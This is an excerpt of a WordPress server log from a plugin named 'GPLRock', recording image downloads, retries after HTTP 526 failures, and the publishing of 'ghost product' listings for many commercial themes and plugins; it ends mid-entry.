https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-10f83fc7.png [04-Apr-2026 21:39:51 UTC] GPLRock: Ghost product published with image - Product ID: king-viral-magazine-wordpress-theme [04-Apr-2026 21:39:53 UTC] GPLRock: Image downloaded successfully for product ambons-ambulance-service-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-78c4defc.jpg [04-Apr-2026 21:39:53 UTC] GPLRock: Using pre-downloaded image for product ambons-ambulance-service-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-78c4defc.jpg [04-Apr-2026 21:39:53 UTC] GPLRock: Ghost product published with image - Product ID: ambons-ambulance-service-wordpress-theme [04-Apr-2026 21:39:55 UTC] GPLRock: Image downloaded successfully for product ultimate-wp-gdpr-compliance-toolkit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-917edc11.jpg [04-Apr-2026 21:39:55 UTC] GPLRock: Using pre-downloaded image for product ultimate-wp-gdpr-compliance-toolkit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-917edc11.jpg [04-Apr-2026 21:39:55 UTC] GPLRock: Ghost product published with image - Product ID: ultimate-wp-gdpr-compliance-toolkit [04-Apr-2026 21:39:56 UTC] GPLRock: Image downloaded successfully for product themify-music-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-94f8c08f.jpg [04-Apr-2026 21:39:56 UTC] GPLRock: Using pre-downloaded image for product themify-music-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-94f8c08f.jpg [04-Apr-2026 21:39:56 UTC] GPLRock: Ghost product published with image - Product ID: themify-music-wordpress-theme [04-Apr-2026 21:39:58 UTC] GPLRock: Image downloaded successfully for product themify-minshop-woocommerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-00804fcd.jpg [04-Apr-2026 21:39:58 UTC] GPLRock: Using pre-downloaded image for product themify-minshop-woocommerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-00804fcd.jpg [04-Apr-2026 21:39:58 UTC] GPLRock: Ghost product published with image - Product ID: themify-minshop-woocommerce-theme [04-Apr-2026 21:39:59 UTC] GPLRock: Image downloaded successfully for product woocommerce-gravity-forms-product-addons (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-94ad99e9.jpg [04-Apr-2026 21:39:59 UTC] GPLRock: Using pre-downloaded image for product woocommerce-gravity-forms-product-addons: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-94ad99e9.jpg [04-Apr-2026 21:39:59 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-gravity-forms-product-addons [04-Apr-2026 21:40:00 UTC] GPLRock: Image downloaded successfully for product layered-popups (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f931342f.jpg [04-Apr-2026 21:40:00 UTC] GPLRock: Using pre-downloaded image for product layered-popups: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f931342f.jpg [04-Apr-2026 21:40:00 UTC] GPLRock: Ghost product published with image - Product ID: layered-popups [04-Apr-2026 21:40:02 UTC] GPLRock: Image downloaded successfully for product woocommerce-ogone (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-098989a1.jpg [04-Apr-2026 21:40:02 UTC] GPLRock: Using pre-downloaded image for product woocommerce-ogone: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-098989a1.jpg [04-Apr-2026 21:40:02 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-ogone [04-Apr-2026 21:40:46 UTC] GPLRock: Image download failed for product woocommerce-paypal-express-checkout-and-paypal-credit (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:40:48 UTC] GPLRock: Image download failed for product woocommerce-paypal-express-checkout-and-paypal-credit (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:40:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-paypal-express-checkout-and-paypal-credit-18505.webp for product woocommerce-paypal-express-checkout-and-paypal-credit after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:40:50 UTC] GPLRock: Image download failed for product woocommerce-paypal-express-checkout-and-paypal-credit (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:40:52 UTC] GPLRock: Image download failed for product woocommerce-paypal-express-checkout-and-paypal-credit (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:40:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-paypal-express-checkout-and-paypal-credit-18505.webp for product woocommerce-paypal-express-checkout-and-paypal-credit after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:40:55 UTC] GPLRock WARNING: Image download failed for product woocommerce-paypal-express-checkout-and-paypal-credit. URL: https://meldwp.com/wp-content/uploads/woocommerce-paypal-express-checkout-and-paypal-credit-18505.webp [04-Apr-2026 21:40:55 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-paypal-express-checkout-and-paypal-credit [04-Apr-2026 21:40:55 UTC] GPLRock: Image download failed for product super-woocommerce-product-filter-shop-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:40:57 UTC] GPLRock: Image download failed for product super-woocommerce-product-filter-shop-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:40:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/super-woocommerce-product-filter--shop-builder-23553.webp for product super-woocommerce-product-filter-shop-builder after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:40:59 UTC] GPLRock: Image download failed for product super-woocommerce-product-filter-shop-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:41:01 UTC] GPLRock: Image download failed for product super-woocommerce-product-filter-shop-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:41:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/super-woocommerce-product-filter--shop-builder-23553.webp for product super-woocommerce-product-filter-shop-builder after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:41:03 UTC] GPLRock WARNING: Image download failed for product super-woocommerce-product-filter-shop-builder. URL: https://meldwp.com/wp-content/uploads/super-woocommerce-product-filter--shop-builder-23553.webp [04-Apr-2026 21:41:03 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: super-woocommerce-product-filter-shop-builder [04-Apr-2026 21:41:03 UTC] GPLRock: Image download failed for product multi-vendor-daily-deals-plugin-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:41:06 UTC] GPLRock: Image download failed for product multi-vendor-daily-deals-plugin-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:41:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/multi-vendor-daily-deals-plugin-for-woocommerce-11819.webp for product multi-vendor-daily-deals-plugin-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:41:08 UTC] GPLRock: Image download failed for product multi-vendor-daily-deals-plugin-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:41:10 UTC] GPLRock: Image download failed for product multi-vendor-daily-deals-plugin-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:41:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/multi-vendor-daily-deals-plugin-for-woocommerce-11819.webp for product multi-vendor-daily-deals-plugin-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:41:12 UTC] GPLRock WARNING: Image download failed for product multi-vendor-daily-deals-plugin-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/multi-vendor-daily-deals-plugin-for-woocommerce-11819.webp [04-Apr-2026 21:41:12 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: multi-vendor-daily-deals-plugin-for-woocommerce [04-Apr-2026 21:41:12 UTC] GPLRock: Image download failed for product woocommerce-pos-loyalty-management (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:41:14 UTC] GPLRock: Image download failed for product woocommerce-pos-loyalty-management (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:41:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce--pos-loyalty-management-17962.webp for product woocommerce-pos-loyalty-management after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:41:16 UTC] GPLRock: Image download failed for product woocommerce-pos-loyalty-management (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:41:19 UTC] GPLRock: Image download failed for product woocommerce-pos-loyalty-management (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:41:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce--pos-loyalty-management-17962.webp for product woocommerce-pos-loyalty-management after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:41:21 UTC] GPLRock WARNING: Image download failed for product woocommerce-pos-loyalty-management. URL: https://meldwp.com/wp-content/uploads/woocommerce--pos-loyalty-management-17962.webp [04-Apr-2026 21:41:21 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-pos-loyalty-management [04-Apr-2026 21:41:21 UTC] GPLRock: Image download failed for product ccgallery-html5-multimedia-gallery (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:41:23 UTC] GPLRock: Image download failed for product ccgallery-html5-multimedia-gallery (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:41:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ccgallery---html5-multimedia-gallery-21531.webp for product ccgallery-html5-multimedia-gallery after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:41:25 UTC] GPLRock: Image download failed for product ccgallery-html5-multimedia-gallery (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:41:27 UTC] GPLRock: Image download failed for product ccgallery-html5-multimedia-gallery (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:41:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ccgallery---html5-multimedia-gallery-21531.webp for product ccgallery-html5-multimedia-gallery after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:41:29 UTC] GPLRock WARNING: Image download failed for product ccgallery-html5-multimedia-gallery. URL: https://meldwp.com/wp-content/uploads/ccgallery---html5-multimedia-gallery-21531.webp [04-Apr-2026 21:41:29 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ccgallery-html5-multimedia-gallery [04-Apr-2026 21:41:29 UTC] GPLRock: Image download failed for product wpbakery-page-builder-add-on-sticker-type-writer (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:41:32 UTC] GPLRock: Image download failed for product wpbakery-page-builder-add-on-sticker-type-writer (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:41:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wpbakery-page-builder-add-on---sticker--type-writer-18917.webp for product wpbakery-page-builder-add-on-sticker-type-writer after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:41:34 UTC] GPLRock: Image download failed for product wpbakery-page-builder-add-on-sticker-type-writer (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:41:36 UTC] GPLRock: Image download failed for product wpbakery-page-builder-add-on-sticker-type-writer (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:41:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wpbakery-page-builder-add-on---sticker--type-writer-18917.webp for product wpbakery-page-builder-add-on-sticker-type-writer after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:41:38 UTC] GPLRock WARNING: Image download failed for product wpbakery-page-builder-add-on-sticker-type-writer. URL: https://meldwp.com/wp-content/uploads/wpbakery-page-builder-add-on---sticker--type-writer-18917.webp [04-Apr-2026 21:41:38 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wpbakery-page-builder-add-on-sticker-type-writer [04-Apr-2026 21:41:38 UTC] GPLRock: Image download failed for product animated-intro-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:41:40 UTC] GPLRock: Image download failed for product animated-intro-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:41:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/animated-intro-for-elementor-22327.webp for product animated-intro-for-elementor after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:41:43 UTC] GPLRock: Image download failed for product animated-intro-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:41:45 UTC] GPLRock: Image download failed for product animated-intro-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:41:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/animated-intro-for-elementor-22327.webp for product animated-intro-for-elementor after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:41:47 UTC] GPLRock WARNING: Image download failed for product animated-intro-for-elementor. URL: https://meldwp.com/wp-content/uploads/animated-intro-for-elementor-22327.webp [04-Apr-2026 21:41:47 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: animated-intro-for-elementor [04-Apr-2026 21:41:47 UTC] GPLRock: Image download failed for product fluxstore-manager-vendor-and-admin-flutter-app-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:41:49 UTC] GPLRock: Image download failed for product fluxstore-manager-vendor-and-admin-flutter-app-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:41:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fluxstore-manager---vendor-and-admin-flutter-app-for-woocommerce-30471.webp for product fluxstore-manager-vendor-and-admin-flutter-app-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:41:51 UTC] GPLRock: Image download failed for product fluxstore-manager-vendor-and-admin-flutter-app-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:41:53 UTC] GPLRock: Image download failed for product fluxstore-manager-vendor-and-admin-flutter-app-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:41:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fluxstore-manager---vendor-and-admin-flutter-app-for-woocommerce-30471.webp for product fluxstore-manager-vendor-and-admin-flutter-app-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:41:55 UTC] GPLRock WARNING: Image download failed for product fluxstore-manager-vendor-and-admin-flutter-app-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/fluxstore-manager---vendor-and-admin-flutter-app-for-woocommerce-30471.webp [04-Apr-2026 21:41:55 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: fluxstore-manager-vendor-and-admin-flutter-app-for-woocommerce [04-Apr-2026 21:41:56 UTC] GPLRock: Image download failed for product woocommerce-google-spreadsheet-addon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:41:58 UTC] GPLRock: Image download failed for product woocommerce-google-spreadsheet-addon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:42:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-google-spreadsheet-addon-19711.webp for product woocommerce-google-spreadsheet-addon after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:42:00 UTC] GPLRock: Image download failed for product woocommerce-google-spreadsheet-addon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:42:02 UTC] GPLRock: Image download failed for product woocommerce-google-spreadsheet-addon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:42:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-google-spreadsheet-addon-19711.webp for product woocommerce-google-spreadsheet-addon after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:42:04 UTC] GPLRock WARNING: Image download failed for product woocommerce-google-spreadsheet-addon. URL: https://meldwp.com/wp-content/uploads/woocommerce-google-spreadsheet-addon-19711.webp [04-Apr-2026 21:42:04 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-google-spreadsheet-addon [04-Apr-2026 21:42:04 UTC] GPLRock: Image download failed for product custom-woocommerce-discounts (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:42:06 UTC] GPLRock: Image download failed for product custom-woocommerce-discounts (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:42:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/custom-woocommerce-discounts-32703.webp for product custom-woocommerce-discounts after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:42:09 UTC] GPLRock: Image download failed for product custom-woocommerce-discounts (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:42:11 UTC] GPLRock: Image download failed for product custom-woocommerce-discounts (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:42:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/custom-woocommerce-discounts-32703.webp for product custom-woocommerce-discounts after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:42:13 UTC] GPLRock WARNING: Image download failed for product custom-woocommerce-discounts. URL: https://meldwp.com/wp-content/uploads/custom-woocommerce-discounts-32703.webp [04-Apr-2026 21:42:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: custom-woocommerce-discounts [04-Apr-2026 21:42:27 UTC] GPLRock: Image downloaded successfully for product wordpress-marketing-plugin-sliding-messages (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-37a5f31d.jpg [04-Apr-2026 21:42:27 UTC] GPLRock: Using pre-downloaded image for product wordpress-marketing-plugin-sliding-messages: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-37a5f31d.jpg [04-Apr-2026 21:42:27 UTC] GPLRock: Ghost product published with image - Product ID: wordpress-marketing-plugin-sliding-messages [04-Apr-2026 21:42:29 UTC] GPLRock: Image downloaded successfully for product canvas-show-any-content-in-a-fullscreen-slide (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-238c3e9c.png [04-Apr-2026 21:42:29 UTC] GPLRock: Using pre-downloaded image for product canvas-show-any-content-in-a-fullscreen-slide: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-238c3e9c.png [04-Apr-2026 21:42:29 UTC] GPLRock: Ghost product published with image - Product ID: canvas-show-any-content-in-a-fullscreen-slide [04-Apr-2026 21:42:30 UTC] GPLRock: Image downloaded successfully for product polylang-for-amp (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-dca81414.jpg [04-Apr-2026 21:42:30 UTC] GPLRock: Using pre-downloaded image for product polylang-for-amp: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-dca81414.jpg [04-Apr-2026 21:42:30 UTC] GPLRock: Ghost product published with image - Product ID: polylang-for-amp [04-Apr-2026 21:42:33 UTC] GPLRock: Image downloaded successfully for product amp-table-of-content-plus-for-amp (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6894842a.png [04-Apr-2026 21:42:33 UTC] GPLRock: Using pre-downloaded image for product amp-table-of-content-plus-for-amp: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6894842a.png [04-Apr-2026 21:42:33 UTC] GPLRock: Ghost product published with image - Product ID: amp-table-of-content-plus-for-amp [04-Apr-2026 21:42:34 UTC] GPLRock: Image downloaded successfully for product xpromoter-top-bar-switcher-responsive-wordpress-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-334ce33c.jpg [04-Apr-2026 21:42:34 UTC] GPLRock: Using pre-downloaded image for product xpromoter-top-bar-switcher-responsive-wordpress-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-334ce33c.jpg [04-Apr-2026 21:42:34 UTC] GPLRock: Ghost product published with image - Product ID: xpromoter-top-bar-switcher-responsive-wordpress-plugin [04-Apr-2026 21:42:36 UTC] GPLRock: Image downloaded successfully for product artfurniture-furniture-theme-for-woocommerce (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-df16533b.jpg [04-Apr-2026 21:42:36 UTC] GPLRock: Using pre-downloaded image for product artfurniture-furniture-theme-for-woocommerce: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-df16533b.jpg [04-Apr-2026 21:42:36 UTC] GPLRock: Ghost product published with image - Product ID: artfurniture-furniture-theme-for-woocommerce [04-Apr-2026 21:42:38 UTC] GPLRock: Image downloaded successfully for product daisho-flexible-wordpress-portfolio-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4b9542e3.jpg [04-Apr-2026 21:42:38 UTC] GPLRock: Using pre-downloaded image for product daisho-flexible-wordpress-portfolio-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4b9542e3.jpg [04-Apr-2026 21:42:38 UTC] GPLRock: Ghost product published with image - Product ID: daisho-flexible-wordpress-portfolio-theme [04-Apr-2026 21:42:40 UTC] GPLRock: Image downloaded successfully for product peace-insurance-agency-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-82b8e649.jpg [04-Apr-2026 21:42:40 UTC] GPLRock: Using pre-downloaded image for product peace-insurance-agency-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-82b8e649.jpg [04-Apr-2026 21:42:40 UTC] GPLRock: Ghost product published with image - Product ID: peace-insurance-agency-wordpress-theme [04-Apr-2026 21:42:42 UTC] GPLRock: Image downloaded successfully for product sparker-directory-and-listings-template (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cd2c8bc5.jpg [04-Apr-2026 21:42:42 UTC] GPLRock: Using pre-downloaded image for product sparker-directory-and-listings-template: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cd2c8bc5.jpg [04-Apr-2026 21:42:42 UTC] GPLRock: Ghost product published with image - Product ID: sparker-directory-and-listings-template [04-Apr-2026 21:42:44 UTC] GPLRock: Image downloaded successfully for product atena-college-and-university-template (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3036a622.png [04-Apr-2026 21:42:44 UTC] GPLRock: Using pre-downloaded image for product atena-college-and-university-template: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3036a622.png [04-Apr-2026 21:42:44 UTC] GPLRock: Ghost product published with image - Product ID: atena-college-and-university-template [04-Apr-2026 21:43:29 UTC] GPLRock: Image downloaded successfully for product dentino-dental-clinic-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a9bd3b3a.jpg [04-Apr-2026 21:43:29 UTC] GPLRock: Using pre-downloaded image for product dentino-dental-clinic-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a9bd3b3a.jpg [04-Apr-2026 21:43:29 UTC] GPLRock: Ghost product published with image - Product ID: dentino-dental-clinic-template-kit [04-Apr-2026 21:43:30 UTC] GPLRock: Image downloaded successfully for product dentica-dental-clinic-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-bebc9d10.webp [04-Apr-2026 21:43:30 UTC] GPLRock: Using pre-downloaded image for product dentica-dental-clinic-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-bebc9d10.webp [04-Apr-2026 21:43:30 UTC] GPLRock: Ghost product published with image - Product ID: dentica-dental-clinic-elementor-template-kit [04-Apr-2026 21:43:32 UTC] GPLRock: Image downloaded successfully for product dentalika-dental-clinic-medical-health-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cbcf791c.jpg [04-Apr-2026 21:43:32 UTC] GPLRock: Using pre-downloaded image for product dentalika-dental-clinic-medical-health-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cbcf791c.jpg [04-Apr-2026 21:43:32 UTC] GPLRock: Ghost product published with image - Product ID: dentalika-dental-clinic-medical-health-elementor-template-kit [04-Apr-2026 21:43:33 UTC] GPLRock: Image downloaded successfully for product dental-dentist-clinic-medical-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-73015ee7.webp [04-Apr-2026 21:43:33 UTC] GPLRock: Using pre-downloaded image for product dental-dentist-clinic-medical-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-73015ee7.webp [04-Apr-2026 21:43:33 UTC] GPLRock: Ghost product published with image - Product ID: dental-dentist-clinic-medical-elementor-template-kit [04-Apr-2026 21:43:35 UTC] GPLRock: Image downloaded successfully for product dentacare-dentist-medical-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-48bfb89e.webp [04-Apr-2026 21:43:35 UTC] GPLRock: Using pre-downloaded image for product dentacare-dentist-medical-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-48bfb89e.webp [04-Apr-2026 21:43:35 UTC] GPLRock: Ghost product published with image - Product ID: dentacare-dentist-medical-elementor-template-kit [04-Apr-2026 21:43:36 UTC] GPLRock: Image downloaded successfully for product denaya-business-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0fb2889b.webp [04-Apr-2026 21:43:36 UTC] GPLRock: Using pre-downloaded image for product denaya-business-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0fb2889b.webp [04-Apr-2026 21:43:36 UTC] GPLRock: Ghost product published with image - Product ID: denaya-business-agency-elementor-template-kit [04-Apr-2026 21:43:38 UTC] GPLRock: Image downloaded successfully for product dempul-car-auto-spa-detailing-services-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-bd40b17c.webp [04-Apr-2026 21:43:38 UTC] GPLRock: Using pre-downloaded image for product dempul-car-auto-spa-detailing-services-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-bd40b17c.webp [04-Apr-2026 21:43:38 UTC] GPLRock: Ghost product published with image - Product ID: dempul-car-auto-spa-detailing-services-elementor-template-kit [04-Apr-2026 21:43:39 UTC] GPLRock: Image downloaded successfully for product dement-coffee-shop-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7284b975.webp [04-Apr-2026 21:43:40 UTC] GPLRock: Using pre-downloaded image for product dement-coffee-shop-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7284b975.webp [04-Apr-2026 21:43:40 UTC] GPLRock: Ghost product published with image - Product ID: dement-coffee-shop-elementor-template-kit [04-Apr-2026 21:43:41 UTC] GPLRock: Image downloaded successfully for product demed-medical-clinic-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d03c8878.webp [04-Apr-2026 21:43:41 UTC] GPLRock: Using pre-downloaded image for product demed-medical-clinic-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d03c8878.webp [04-Apr-2026 21:43:41 UTC] GPLRock: Ghost product published with image - Product ID: demed-medical-clinic-elementor-template-kit [04-Apr-2026 21:43:43 UTC] GPLRock: Image downloaded successfully for product deliverra-food-grocery-delivery-app-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9575cec1.jpg [04-Apr-2026 21:43:43 UTC] GPLRock: Using pre-downloaded image for product deliverra-food-grocery-delivery-app-elementor-template-kit: 